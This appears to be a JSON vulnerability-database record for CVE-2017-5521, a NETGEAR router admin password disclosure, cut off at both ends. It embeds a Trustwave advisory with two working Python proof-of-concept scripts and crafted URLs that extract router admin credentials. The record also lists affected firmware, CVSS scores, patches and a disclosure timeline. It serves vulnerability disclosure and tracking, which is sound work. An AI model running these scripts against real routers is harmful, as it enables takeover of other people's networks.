"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-00835",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-113724",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2017-5521",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5521",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5521",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-5521",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-00835",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201701-454",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-113724",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-5521",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear\u0027s wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. \nSuccessful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003:\nMultiple Vulnerabilities in NETGEAR Routers\n \nPublished: 01/30/2017\nVersion: 1.0\n \nVendor: NETGEAR (http://www.netgear.com/)\nProduct: Multiple products\n \nFinding 1: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\n# D6400 V1.0.0.34_1.3.34\n# D6400 V1.0.0.38_1.1.38\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.30_10.0.73\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.26_1.0.41\n# R8500 V1.0.0.56_1.0.28\n# R8500 V1.0.0.20_1.0.11\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.29_1.0.29\n# VEGN2610 V1.0.0.27_1.0.27\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.42_1.0.25\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\n# WN3100RP V1.0.0.6_1.0.12\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nProduct description:\nMultiple Netgear Routers\n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. \nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser:\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\n \n## netgore.py\nimport sys\nimport requests\n \n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage - get token\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\ntoken = scrape(r.text, \u0027unauth.cgi?id=\u0027, \u0027\\\"\u0027)\nif token == \u0027i_dont_speak_english\u0027:\n print \"not vulnerable\"\n sys.exit(0)\nprint \"token found: \" + token\n#2nd stage - pass the token - get the password\nurl = url + \u0027passwordrecovered.cgi?id=\u0027 + token\nr = requests.post(url, verify=False)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable becuse password recovery IS set\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \nFinding 2: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6300 V1.0.0.96_1.1.96 (Latest)\n# D6300B V1.0.0.36_1.0.36\n# D6300B V1.0.0.32_1.0.32\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\n# DGN2200v4 V1.0.0.66_1.0.66\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.56_1.0.43 (Latest)\n# R6200 V1.0.1.52_1.0.41\n# R6200 V1.0.1.48_1.0.37\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\n# R6200v2 V1.0.1.20_1.0.18\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\n# R6250 V1.0.1.84_1.0.78 \n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\n# R6700 V1.0.0.26_10.0.26 (Latest)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R7000 V1.0.4.30_1.1.67\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\n# R7900 V1.0.0.10_10.0.7\n# R7900 V1.0.0.8_10.0.5\n# R7900 V1.0.0.6_10.0.4\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.30_1.0.43\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.27_1.0.27\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\n# VEVG2660 V1.0.0.23_1.0.23\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\n# WNDR3400v3 V1.0.1.2_1.0.51\n# WNDR3400v3 V1.0.0.22_1.0.29\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.50_1.0.30\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\n# WNR3500Lv2 V1.2.0.32_40.0.74\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. \n \nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password. \nThe issue occurs after every reboot of the router. \n \nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser:\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\n \n## netgore2.py\nimport sys\nimport requests\n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\n#2nd stage\nurl = url + \u0027passwordrecovered.cgi?id=get_rekt\u0027\ntry:\n r = requests.post(url, verify=False)\nexcept:\n print \"not vulnerable router\"\n sys.exit(0)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \n \nRemediation Steps:\nPlease see NETGEAR\u0027s KBA for list of firmware patches for various models. \n \nRevision History:\n04/06/2016 - Vulnerability disclosed to vendor\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\n05/18/2016 - Request for update; no response\n07/14/2016 - Request for update\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\n10/17/2016 - Request for update\n12/15/2016 - Notice of intent to publish advisories\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\n01/30/2017 - Advisory published\n \n \nReferences\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\n2. https://www.exploit-db.com/exploits/32883/\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n \n \nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n \nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n \nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5521"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "PACKETSTORM",
"id": "140844"
}
],
"trust": 2.7
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-113724",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41205",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2017-5521",
"trust": 4.4
},
{
"db": "BID",
"id": "95457",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "41205",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-00835",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "140844",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-92639",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-113724",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5521",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "32883",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "PACKETSTORM",
"id": "140844"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"id": "VAR-201701-0766",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
}
],
"trust": 1.2234779957142856
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
}
]
},
"last_update_date": "2024-11-23T22:13:11.146000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Web\u00a0GUI\u00a0Password\u00a0Recovery\u00a0and\u00a0Exposure\u00a0Security\u00a0Vulnerability",
"trust": 0.8,
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability?cid=wmt_netgear_organic"
},
{
"title": "Patches for administrator password information disclosure vulnerabilities in various NETGEAR routers",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/88524"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=67049"
},
{
"title": "kenzer-templates",
"trust": 0.1,
"url": "https://github.com/Elsfa7-110/kenzer-templates "
},
{
"title": "kenzer-templates",
"trust": 0.1,
"url": "https://github.com/ARPSyndicate/kenzer-templates "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/new-mirai-variant-carries-out-54-hour-ddos-attacks/124660/"
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2017/01/31/major_security_hole_in_netgear_routers/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/hardware/31-netgear-router-models-affected-by-flaw-that-exposes-admin-password/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-200",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.8,
"url": "http://kb.netgear.com/30632/web-gui-password-recovery-and-exposure-security-vulnerability"
},
{
"trust": 2.0,
"url": "http://www.securityfocus.com/bid/95457"
},
{
"trust": 1.4,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5521"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/95457/"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.2,
"url": "https://\u0027"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/netgear_password_disclosure"
},
{
"trust": 0.1,
"url": "http://router/passwordrecovered.cgi?id=trustwave_spiderlabs"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "http://router/.../"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5521"
},
{
"trust": 0.1,
"url": "http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/32883/"
},
{
"trust": 0.1,
"url": "http://router/..../unauth.cgi?id=token"
},
{
"trust": 0.1,
"url": "http://router/passwordrecovered.cgi?id=token"
},
{
"trust": 0.1,
"url": "http://www.netgear.com/)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "PACKETSTORM",
"id": "140844"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"db": "BID",
"id": "95457",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "140844",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2017-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"date": "2017-01-17T00:00:00",
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"date": "2017-01-17T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"date": "2017-01-16T00:00:00",
"db": "BID",
"id": "95457",
"ident": null
},
{
"date": "2017-02-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"date": "2017-01-31T17:02:22",
"db": "PACKETSTORM",
"id": "140844",
"ident": null
},
{
"date": "2017-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"date": "2017-01-17T09:59:00.333000",
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2017-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"date": "2017-01-23T03:09:00",
"db": "BID",
"id": "95457",
"ident": null
},
{
"date": "2024-07-01T06:31:00",
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"date": "2017-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"date": "2024-11-21T03:27:48.497000",
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "plural \u00a0NETGEAR\u00a0 Password disclosure vulnerability in device products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
}
],
"trust": 0.6
}
}
var-202004-1320
Vulnerability from variot
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR AC1450, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that the WEB application does not fully verify whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1320",
"affected_products": {
"@context": {
